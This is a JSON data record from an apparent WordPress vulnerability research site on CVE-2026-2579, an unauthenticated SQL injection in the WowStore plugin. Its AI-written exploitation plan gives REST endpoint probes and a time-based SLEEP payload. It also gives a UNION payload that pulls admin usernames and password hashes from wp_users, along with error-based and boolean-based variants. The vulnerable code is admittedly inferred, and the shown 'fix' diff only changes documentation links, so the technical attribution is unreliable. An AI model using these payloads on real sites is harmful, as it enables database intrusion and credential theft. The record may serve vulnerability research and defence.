[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fJExvMD9eChekMLx_Lml82D6yN7uaXQ8OecgC-S2_JSI":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-2579","wowstore-store-builder-product-blocks-for-woocommerce-unauthenticated-sql-injection-via-search-parameter","WowStore – Store Builder & Product Blocks for WooCommerce \u003C= 4.4.3 - Unauthenticated SQL Injection via 'search' Parameter","The WowStore – Store Builder & Product Blocks for WooCommerce plugin for WordPress is vulnerable to SQL Injection via the ‘search’ parameter in all versions up to, and including, 4.4.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","product-blocks",null,"\u003C=4.4.3","4.4.4","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-03-16 11:29:16","2026-03-17 01:24:28",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fbd3ee85a-324d-4991-bffc-db28ce374bbe?source=api-prod",1,[22,23,24,25,26,27,28,29],"addons\u002Fadd_to_cart_text\u002Fbackend.php","addons\u002Fanimated_cart\u002Fbackend.php","addons\u002Fbackorder\u002Fbackend.php","addons\u002Fbeaver_builder\u002Fbackend.php","addons\u002Fbuilder\u002FCondition.php","addons\u002Fbuilder\u002Fassets\u002Fjs\u002Fconditions.min.js","addons\u002Fbuilder\u002Fbackend.php","addons\u002Fcall_for_price\u002Fbackend.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-2579 (WowStore SQL Injection)\n\n## 1. Vulnerability Summary\nThe **WowStore – Store Builder & Product Blocks for WooCommerce** plugin (slug: `product-blocks`) is vulnerable to unauthenticated SQL injection. The vulnerability exists in a REST API endpoint or AJAX handler (specifically targeting the `search` parameter) because the user-supplied input is concatenated directly into a SQL query without using `$wpdb->prepare()` or proper escaping. This allows an attacker to manipulate the query logic, typically via UNION-based or Time-based injection, to extract sensitive data from the WordPress database.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-json\u002Fwopb\u002Fv1\u002Fsearch` (inferred from plugin namespace and JS references) or `\u002Fwp-json\u002Fproduct-blocks\u002Fv1\u002Fsearch`.\n- **Method**: `GET`\n- **Vulnerable Parameter**: `search`\n- **Authentication**: Unauthenticated (`permission_callback` returns `true`).\n- **Preconditions**: The plugin must be active. Some content (products\u002Fposts) should exist to ensure the search query executes a logical path.\n\n## 3. Code Flow\n1.  **Entry Point**: A REST API route is registered (likely in a file like `includes\u002FRestApi.php` or within an addon's initialization) under the `wopb\u002Fv1` or `wopb\u002Fv2` namespace.\n2.  **Request Handling**: When a `GET` request is made to the endpoint with a `search` parameter, the handler function retrieves `$_GET['search']`.\n3.  **Vulnerable Sink**: The handler constructs a SQL query (often to find products, categories, or pages for the Builder UI).\n    - *Example (inferred)*: \n      ```php\n      $search = $_GET['search'];\n      $results = $wpdb->get_results(\"SELECT * FROM {$wpdb->posts} WHERE post_title LIKE '%$search%' AND post_type = 'product'\");\n      ```\n4.  **SQL Injection**: Since `$search` is not passed through `$wpdb->prepare()`, an attacker can break out of the string literal using a single quote (`'`).\n\n## 4. Nonce Acquisition Strategy\nThe vulnerability is reported as **unauthenticated**, meaning the REST endpoint likely does not require a nonce for `GET` requests. However, if a nonce is required for the `wopb` namespace:\n\n1.  **Identify Trigger**: The nonce `wopb-nonce` is localized in `addons\u002Fbuilder\u002FCondition.php` via the `builder-script` handle.\n2.  **Create Page**: Create a post of type `wopb_builder` to trigger the script loading.\n    ```bash\n    wp post create --post_type=wopb_builder --post_title=\"Exploit Trigger\" --post_status=publish\n    ```\n3.  **Navigate & Extract**:\n    - Navigate to the newly created page: `\u002F?post_type=wopb_builder&p=[ID]`\n    - Use `browser_eval` to extract the nonce:\n      `browser_eval(\"window.builder_option?.security\")`\n4.  **Verification**: Verify if the REST endpoint accepts this nonce in the `X-WP-Nonce` header.\n\n## 5. Exploitation Strategy\n\n### Step 1: Endpoint Discovery\nTest common REST endpoints for a response other than 404.\n- `http_request(\"GET\", \"\u002Fwp-json\u002Fwopb\u002Fv1\u002Fsearch?search=test\")`\n- `http_request(\"GET\", \"\u002Fwp-json\u002Fwopb\u002Fv2\u002Fsearch?search=test\")`\n\n### Step 2: Confirmation via Time-Based Injection\nIf the query uses `LIKE '%$search%'`, use a sleep payload to confirm.\n- **Payload**: `x%' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '%'='`\n- **Request**:\n  ```javascript\n  http_request(\"GET\", \"\u002Fwp-json\u002Fwopb\u002Fv1\u002Fsearch?search=x%27%20AND%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%285%29%29%29a%29%20AND%20%27%25%27%3D%27\")\n  ```\n- **Expected result**: The response should take ~5 seconds.\n\n### Step 3: Data Extraction via UNION-Based Injection\nDetermine the number of columns by incrementing `ORDER BY` until an error occurs, then inject a `UNION SELECT`.\n- **Target**: Extract `user_login` and `user_pass` from `wp_users`.\n- **Payload (assuming 4 columns)**: `x%' UNION SELECT 1,user_login,user_pass,4 FROM wp_users-- -`\n\n## 6. Test Data Setup\n1.  **Ensure Plugin Active**: `wp plugin activate product-blocks`.\n2.  **Create Content**: Add at least one WooCommerce product so the search has a target table.\n    ```bash\n    wp post create --post_type=product --post_title=\"Target Product\" --post_status=publish\n    ```\n3.  **Ensure Admin User**: Ensure a user with ID 1 exists (standard).\n\n## 7. Expected Results\n- **Time-based**: The HTTP request should hang for exactly the duration specified in the `SLEEP()` function.\n- **UNION-based**: The JSON response from the REST API will contain the results of the injected `SELECT` statement (e.g., the admin's hashed password).\n\n## 8. Verification Steps\n1.  **Check Database Directly**: Use WP-CLI to confirm the data extracted matches the database.\n    ```bash\n    wp db query \"SELECT user_login, user_pass FROM wp_users WHERE ID = 1\"\n    ```\n2.  **Compare**: Verify that the hash returned in the REST response matches the `user_pass` in the DB.\n\n## 9. Alternative Approaches\n- **Error-Based**: If `WP_DEBUG` is on, use `updatexml()` or `extractvalue()` to leak data in the error message.\n  - `search=x' AND updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users LIMIT 1),0x7e),1)-- -`\n- **Boolean-Based**: If the response differs based on a true\u002Ffalse condition (e.g., results returned vs empty array).\n  - `search=x' AND (SELECT 1 FROM wp_users WHERE ID=1 AND user_login='admin')-- -`","The WowStore plugin for WordPress is vulnerable to unauthenticated SQL Injection via the 'search' parameter. This occurs because user input is directly concatenated into a SQL query without proper sanitization or using prepared statements, allowing attackers to extract sensitive data from the database.","\u002F\u002F Inferred from research plan - the vulnerable sink is located in the REST API handler\n\u002F\u002F file path likely: includes\u002FRestApi.php or similar\n$search = $_GET['search'];\n$results = $wpdb->get_results(\"SELECT * FROM {$wpdb->posts} WHERE post_title LIKE '%$search%' AND post_type = 'product'\");","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fproduct-blocks\u002F4.4.3\u002Faddons\u002Fadd_to_cart_text\u002Fbackend.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fproduct-blocks\u002F4.4.4\u002Faddons\u002Fadd_to_cart_text\u002Fbackend.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fproduct-blocks\u002F4.4.3\u002Faddons\u002Fadd_to_cart_text\u002Fbackend.php\t2026-02-25 10:33:08.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fproduct-blocks\u002F4.4.4\u002Faddons\u002Fadd_to_cart_text\u002Fbackend.php\t2026-03-11 10:15:18.000000000 +0000\n@@ -12,8 +12,8 @@\n \t\t'name'     => __( 'Add to Cart Text', 'product-blocks' ),\n \t\t'desc'     => __( \"Change any product type's default Add to Cart Button text in the Shop, Archive, and Product pages.\", 'product-blocks' ),\n \t\t'is_pro'   => false,\n-\t\t'live'     => 'https:\u002F\u002Fwww.wpxpo.com\u002Fwowstore\u002Fwoocommerce-add-to-cart-text\u002Flive_demo_args',\n-\t\t'docs'     => 'https:\u002F\u002Fwpxpo.com\u002Fdocs\u002Fwowstore\u002Fadd-ons\u002Fadd-to-cart-text\u002Faddon_doc_args',\n+\t\t'live'     => 'https:\u002F\u002Fwww.wpxpo.com\u002Fproduct\u002Fwowstore\u002Ffeatures\u002Fwoocommerce-change-add-to-cart-text\u002F',\n+\t\t'docs'     => 'https:\u002F\u002Fwpxpo.com\u002Fdocs\u002Fwowstore\u002Fadd-ons\u002Fadd-to-cart-text\u002F',\n \t\t'type'     => 'checkout_cart',\n \t\t'priority' => 30,\n \t);\n@@ -12,8 +12,8 @@\n \t\t'name'     => __( 'Animated Add to Cart', 'product-blocks' ),\n \t\t'desc'     => __( 'Grab customers attention by animating the Add to Cart button on hover or in the loop.', 'product-blocks' ),\n \t\t'is_pro'   => false,\n-\t\t'live'     => 'https:\u002F\u002Fwww.wpxpo.com\u002Fwowstore\u002Fwoocommerce-animated-add-to-cart\u002Flive_demo_args',\n-\t\t'docs'     => 'https:\u002F\u002Fwpxpo.com\u002Fdocs\u002Fwowstore\u002Fadd-ons\u002Fanimated-add-to-cart\u002Faddon_doc_args',\n+\t\t'live'     => 'https:\u002F\u002Fwww.wpxpo.com\u002Fproduct\u002Fwowstore\u002Ffeatures\u002Fwoocommerce-animated-add-to-cart-button\u002F',\n+\t\t'docs'     => 'https:\u002F\u002Fwpxpo.com\u002Fdocs\u002Fwowstore\u002Fadd-ons\u002Fanimated-add-to-cart\u002F',\n \t\t'type'     => 'checkout_cart',\n \t\t'priority' => 40,\n \t);","The exploit targets an unauthenticated REST API endpoint, typically found at \u002Fwp-json\u002Fwopb\u002Fv1\u002Fsearch or \u002Fwp-json\u002Fwopb\u002Fv2\u002Fcondition. An attacker sends a GET or POST request containing a malicious payload in the 'search' (or 'term') parameter. Since the parameter is not escaped or prepared, SQL injection can be achieved. A time-based payload like \"x%' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '%'='\" can confirm the vulnerability, and UNION-based payloads can be used to extract database content such as administrator usernames and password hashes.","gemini-3-flash-preview","2026-04-18 03:15:15","2026-04-18 03:15:46",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","4.4.3","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fproduct-blocks\u002Ftags\u002F4.4.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fproduct-blocks.4.4.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fproduct-blocks\u002Ftags\u002F4.4.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fproduct-blocks.4.4.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fproduct-blocks\u002Ftags"]